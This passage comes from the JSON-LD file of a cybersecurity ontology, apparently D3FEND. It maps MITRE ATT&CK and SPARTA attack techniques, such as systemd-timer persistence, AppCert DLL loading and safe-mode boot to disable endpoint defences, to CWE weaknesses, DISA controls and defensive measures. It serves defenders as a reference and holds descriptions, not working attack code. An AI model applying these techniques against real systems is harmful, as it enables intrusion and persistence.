      "d3f:definition": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)",
      "rdfs:label": "Systemd Timers",
      "rdfs:subClassOf": {
        "@id": "d3f:T1053"
      }
    },
    {
      "@id": "d3f:CCI-001089_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements security functions as a layered structure minimizing interactions between layers of the design and avoiding any dependence by lower layers on the functionality or correctness of higher layers.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001089"
    },
    {
      "@id": "d3f:CWE-647",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-647",
      "d3f:definition": "The product defines policy namespaces and makes authorization decisions based on the assumption that a URL is canonical. This can allow a non-canonical URL to bypass the authorization.",
      "rdfs:label": "Use of Non-Canonical URL Paths for Authorization Decisions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-863"
      }
    },
    {
      "@id": "d3f:OTRunCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a device to start or resume a service/program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Run Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N3a1d7598f06b4938850c39c069632c1b"
        }
      ]
    },
    {
      "@id": "_:N3a1d7598f06b4938850c39c069632c1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:T1213",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Resource"
      },
      "d3f:attack-id": "T1213",
      "d3f:definition": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.",
      "rdfs:label": "Data from Information Repositories",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nfda6200cc156417a94b00ecb6ea9245b"
        }
      ]
    },
    {
      "@id": "_:Nfda6200cc156417a94b00ecb6ea9245b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:EXF-0008",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0008",
      "d3f:definition": "By breaching development or integration environments (at the mission owner, contractor, or partner), the adversary gains access to source code, test vectors, telemetry captures, build artifacts, documentation, and configuration data, material that is often more complete than flight archives. Beyond theft of intellectual property, the attacker can embed telemetry taps, extended logging, or data “export” features into test harnesses, simulators, or flight builds so that, once fielded, the system produces extra observables or forwards content to non-mission endpoints. This activity typically occurs pre-launch during software production and ATLO, positioning exfiltration mechanisms to activate later in flight.",
      "rdfs:label": "Compromised Developer Site - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0008/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Compromised Developer Site"
    },
    {
      "@id": "d3f:T1088",
      "@type": "owl:Class",
      "d3f:attack-id": "T1088",
      "d3f:definition": "Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.002",
      "rdfs:label": "Bypass User Account Control",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000765_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for network access to privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000765"
    },
    {
      "@id": "d3f:Software-definedRadioRFStateChangeEvent",
      "@type": "owl:Class",
      "d3f:definition": "A software-defined radio (SDR) event where one or more radio-frequency (RF) parameters have been changed in a way that affects reception or emission (e.g., center frequency retune, gain/attenuation update, bandwidth/filter selection, antenna/port switch, TX enable/disable, etc.).",
      "rdfs:label": "Software-defined Radio RF State Change Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software-definedRadioEvent"
        },
        {
          "@id": "_:Na581bb6d745a4c6aacb3593276c90d59"
        }
      ]
    },
    {
      "@id": "_:Na581bb6d745a4c6aacb3593276c90d59",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioConfiguration"
      }
    },
    {
      "@id": "d3f:T1136",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1136",
      "d3f:creates": {
        "@id": "d3f:UserAccount"
      },
      "d3f:definition": "Adversaries may create an account to maintain access to victim systems. (Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.",
      "rdfs:label": "Create Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N358b0922c6284dd5935343dc588bc72b"
        }
      ]
    },
    {
      "@id": "_:N358b0922c6284dd5935343dc588bc72b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1206",
      "@type": "owl:Class",
      "d3f:attack-id": "T1206",
      "d3f:definition": "The <code>sudo</code> command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\" (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code> that is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.003",
      "rdfs:label": "Sudo Caching",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:RawMemoryAccessFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:MemoryBlock"
      },
      "d3f:definition": "A function which accesses raw memory, usually using memory addresses.",
      "rdfs:label": "Raw Memory Access Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N8307051d88c5494cbeb184f563a30d4c"
        }
      ]
    },
    {
      "@id": "_:N8307051d88c5494cbeb184f563a30d4c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:T1626.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1626.001",
      "d3f:definition": "Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device. By abusing the API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642), factory resetting the device for [File Deletion](https://attack.mitre.org/techniques/T1630/002) and to delete any traces of the malware, disabling all the device’s cameras, or to make it more difficult to uninstall the app.",
      "rdfs:label": "Device Administrator Permissions - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1626"
      },
      "skos:prefLabel": "Device Administrator Permissions"
    },
    {
      "@id": "d3f:T1422",
      "@type": "owl:Class",
      "d3f:attack-id": "T1422",
      "d3f:definition": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of devices they access or through information discovery of remote systems.",
      "rdfs:label": "System Network Configuration Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "System Network Configuration Discovery"
    },
    {
      "@id": "d3f:EXF-0003.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0003.01",
      "d3f:definition": "Here the target is command traffic from ground to space. By receiving or tapping the uplink path, the adversary collects telecommand frames, ranging/acquisition exchanges, and any file or table uploads. If confidentiality is weak or absent, opcode/argument content, dictionaries, and procedures become directly readable; even when encrypted, session structure, counters, and acceptance timing inform future command-link intrusion or replay. Captured material can reveal maintenance windows, contingency dictionaries, and authentication schemes that enable subsequent exploitation.",
      "rdfs:label": "Uplink Exfiltration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0003/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0003"
      },
      "skos:prefLabel": "Uplink Exfiltration"
    },
    {
      "@id": "d3f:MessageHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MessageHardening"
      ],
      "d3f:d3fend-id": "D3-MH",
      "d3f:definition": "The application of security controls to user-to-user and system-to-system communications so messages remain confidential, unaltered, and verifiable while resisting injection, replay, and tampering.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "rdfs:label": "Message Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N77357bf005724a36980cee222e57b7b2"
        }
      ]
    },
    {
      "@id": "_:N77357bf005724a36980cee222e57b7b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "d3f:CreateSocket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:Pipe"
      },
      "d3f:definition": "A create socket system call creates an endpoint for communication and returns a file descriptor that refers to that endpoint.",
      "rdfs:label": "Create Socket",
      "rdfs:seeAlso": {
        "@id": "https://www.man7.org/linux/man-pages/man2/socket.2.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N208d6fe77ab742059eca87cfe2a36673"
        }
      ]
    },
    {
      "@id": "_:N208d6fe77ab742059eca87cfe2a36673",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:powered-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x powered-by y: x obtains its essential energy or force from y to perform its function or remain active.",
      "owl:inverseOf": {
        "@id": "d3f:powers"
      },
      "rdfs:label": "powered-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:depends-on"
      }
    },
    {
      "@id": "d3f:AssetVulnerabilityEnumeration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AssetVulnerabilityEnumeration"
      ],
      "d3f:d3fend-id": "D3-AVE",
      "d3f:definition": "Asset vulnerability enumeration enriches inventory items with knowledge identifying their vulnerabilities.",
      "d3f:evaluates": [
        {
          "@id": "d3f:PhysicalArtifact"
        },
        {
          "@id": "d3f:Software"
        }
      ],
      "d3f:identifies": {
        "@id": "d3f:Vulnerability"
      },
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AutomatedComputerVulnerabilityResolutionSystem"
        },
        {
          "@id": "d3f:Reference-SecurityVulnerabilityInformationAggregation"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForVulnerabilityRiskAssessment"
        }
      ],
      "rdfs:label": "Asset Vulnerability Enumeration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:N63aff903360b4776bf9069f0f7dfd046"
        },
        {
          "@id": "_:N6ff4578831ee41849b4ef7946c488d42"
        },
        {
          "@id": "_:N5a725bf2753a4b46b7d9d72b72f4cc6e"
        }
      ]
    },
    {
      "@id": "_:N63aff903360b4776bf9069f0f7dfd046",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "_:N6ff4578831ee41849b4ef7946c488d42",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "_:N5a725bf2753a4b46b7d9d72b72f4cc6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Vulnerability"
      }
    },
    {
      "@id": "d3f:T1111",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1111",
      "d3f:definition": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.",
      "d3f:may-access": {
        "@id": "d3f:SecurityToken"
      },
      "rdfs:label": "Multi-Factor Authentication Interception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N89433d9c2f5442a78545de22bc165984"
        }
      ]
    },
    {
      "@id": "_:N89433d9c2f5442a78545de22bc165984",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecurityToken"
      }
    },
    {
      "@id": "d3f:ResourceAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Ephemeral digital artifact comprising a request of a resource and any response from that resource.",
      "rdfs:label": "Resource Access",
      "rdfs:seeAlso": {
        "@id": "dbr:Computer_access_control"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserAction"
      }
    },
    {
      "@id": "d3f:T1562.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.009",
      "d3f:definition": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)",
      "d3f:disables": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "d3f:SystemConfigurationInitDatabaseRecord"
        }
      ],
      "d3f:may-modify": {
        "@id": "d3f:EndpointHealthBeacon"
      },
      "rdfs:label": "Safe Mode Boot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:Nd94bd7c230074e68929f59ae2a720c5a"
        },
        {
          "@id": "_:N81598aee366c4302ad71433665dadbf7"
        },
        {
          "@id": "_:Ne096ba91e2bb4d399cfa9d5ddf7ee588"
        }
      ]
    },
    {
      "@id": "_:Nd94bd7c230074e68929f59ae2a720c5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EndpointSensor"
      }
    },
    {
      "@id": "_:N81598aee366c4302ad71433665dadbf7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationInitDatabaseRecord"
      }
    },
    {
      "@id": "_:Ne096ba91e2bb4d399cfa9d5ddf7ee588",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EndpointHealthBeacon"
      }
    },
    {
      "@id": "d3f:T1513",
      "@type": "owl:Class",
      "d3f:attack-id": "T1513",
      "d3f:definition": "Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015)",
      "rdfs:label": "Screen Capture - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Screen Capture"
    },
    {
      "@id": "d3f:CWE-1392",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1392",
      "d3f:definition": "The product uses default credentials (such as passwords or cryptographic keys) for potentially critical functionality.",
      "rdfs:label": "Use of Default Credentials",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1391"
      }
    },
    {
      "@id": "d3f:T1546.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.009",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. (Citation: Elastic Process Injection July 2017)",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "AppCert DLLs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Nffc0e17b35404c4189e3532f64e65095"
        },
        {
          "@id": "_:N8e5e75f1c51d4a3f96e8e2c5ac817910"
        },
        {
          "@id": "_:N8794bd215abd4fc98f40c251642d0526"
        }
      ]
    },
    {
      "@id": "_:Nffc0e17b35404c4189e3532f64e65095",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N8e5e75f1c51d4a3f96e8e2c5ac817910",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N8794bd215abd4fc98f40c251642d0526",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:Reference-TechnicalProductGuideTriconSystems",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.nrc.gov/docs/ml0932/ml093290424.pdf"
      },
      "d3f:kb-abstract": "Information in this document is subject to change without notice. Companies, names and data used in examples herein are fictitious unless otherwise noted. No part of this document may be reproduced or transmitted in any form or by any means, electronic or mechanical, for any purpose, without the express written permission of Triconex",
      "d3f:kb-organization": "Rockwell Automation",
      "d3f:kb-reference-of": {
        "@id": "d3f:DisableRemoteAccess"
      },
      "d3f:kb-reference-title": "Technical Product Guide Tricon Systems",
      "rdfs:label": "Reference - Technical Product Guide Tricon Systems"
    },
    {
      "@id": "d3f:has-prerequisite",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-prerequisite",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-use-case-object-property"
      }
    },
    {
      "@id": "d3f:CWE-1332",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1332",
      "d3f:definition": "The device is missing or incorrectly implements circuitry or sensors that detect and mitigate the skipping of security-critical CPU instructions when they occur.",
      "rdfs:label": "Improper Handling of Faults that Lead to Instruction Skips",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1384"
      }
    },
    {
      "@id": "d3f:ScheduledJobEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the lifecycle or management of scheduled tasks within a system, including creation, modification, execution, or removal.",
      "rdfs:label": "Scheduled Job Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/scheduled_job_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N3b3a6083c6a545afaf8f9dffdd10c79b"
        }
      ]
    },
    {
      "@id": "_:N3b3a6083c6a545afaf8f9dffdd10c79b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "d3f:ServiceUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing changes made to a service application, such as updates, reconfigurations, or patch installations, ensuring its continued availability and functionality.",
      "rdfs:label": "Service Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationUpdateEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:N968e96ce008447e4a6c47b28c0b6bd8b"
        }
      ]
    },
    {
      "@id": "_:N968e96ce008447e4a6c47b28c0b6bd8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceInstallationEvent"
      }
    },
    {
      "@id": "d3f:GlobalUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A type of user account in Microsoft Windows (NT) that has a domain-wide scope. It defines the user's access to a logical group of network objects (computers, users, devices) that share the same Active Directory databases; that is, a user's access to the domain.",
      "rdfs:label": "Global User Account",
      "rdfs:seeAlso": {
        "@id": "https://networkencyclopedia.com/global-user-account"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CCI-002010_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system electronically verifies Personal Identity Verification (PIV) credentials from other federal agencies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002010"
    },
    {
      "@id": "d3f:CertificatePinning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CertificatePinning"
      ],
      "d3f:authenticates": {
        "@id": "d3f:PublicKey"
      },
      "d3f:d3fend-id": "D3-CP",
      "d3f:definition": "Persisting either a server's X.509 certificate or its public key and comparing that to the server's presented identity to allow for greater client confidence in the remote server's identity for SSL connections.",
      "d3f:hardens": {
        "@id": "d3f:Certificate"
      },
      "d3f:kb-article": "## How it works\nPinning allows for a trusted copy of a certificate or public key to be associated with a server, thus reducing the likelihood of frequently visited sites being subjected to man-in-the-middle attacks. Certificates or public keys can be pinned after a trusted connection has been established or the pinning can be preloaded in an application, which is the preferred method for mobile applications.\n\nPinning can take the form of certificate pinning or public key pinning.\n\n## Forms of Pinning\n* Certificate Pinning (CP) allows for the client to verify the X.509 certificate with a preloaded certificate. Typically, this involves storing a hash of the certificate and using the stored hash for comparison to the hash of the certificate submitted during the SSL handshake.\n\n* Public Key Pinning (PKP) requires the extraction of a public key from the server's certificate. The stored public key is compared to the server's presented public key. A public key is expected to rotate less frequently than an X.509 certificate and is generally favored over certificate pinning.\n\nAn extension of PKP, Subject Public Key Information Pinning (SPKI), includes public key pinning plus additional information for SSL connections. The additional information can include preferred algorithms.\n\n## Considerations\n\n* With pinned certificates whenever a server updates its certificate, the pinned certificates will also need to be updated\n* With pinned public keys the extracted key may be subject to key refresh policies but much less frequently\n* Servers can become unavailable if pinned objects are set and not updated with the rotated identities. This may require a pinning strategy to be developed.\n* The application of this technique within web browser applications has been [deprecated](https://developer.mozilla.org/en-US/docs/Web/HTTP/Public_Key_Pinning) by popular web browser developers. They now favor certificate analysis via public certificate transparency logs, and the EXPECT-CT HTTP header.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CertificateAndPublicKeyPinning"
        },
        {
          "@id": "d3f:Reference-End-to-endCertificatePinning"
        },
        {
          "@id": "d3f:Reference-PublicKeyPinningExtensionForHTTP"
        }
      ],
      "rdfs:label": "Certificate Pinning",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialHardening"
        },
        {
          "@id": "_:N53c0506adf524c8f9d1668dff9b7e87f"
        },
        {
          "@id": "_:N257ddcc0b4ce4f4e95cfa9c5e5d48f32"
        }
      ]
    },
    {
      "@id": "_:N53c0506adf524c8f9d1668dff9b7e87f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PublicKey"
      }
    },
    {
      "@id": "_:N257ddcc0b4ce4f4e95cfa9c5e5d48f32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:T1149",
      "@type": "owl:Class",
      "d3f:attack-id": "T1149",
      "d3f:definition": "**This technique has been deprecated and should no longer be used.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated and should no longer be used.**",
      "rdfs:label": "LC_MAIN Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CloudStorage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Cloud storage is storage held within a computing cloud.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Cloud_storage"
      },
      "rdfs:label": "Cloud Storage",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Cloud_computing"
        },
        {
          "@id": "https://schema.ocsf.io/objects/databucket"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:CCI-001069_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to detect the presence of unauthorized software on organizational information systems and notify designated organizational officials in accordance with the organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001069"
    },
    {
      "@id": "d3f:T1619",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CloudStorage"
      },
      "d3f:attack-id": "T1619",
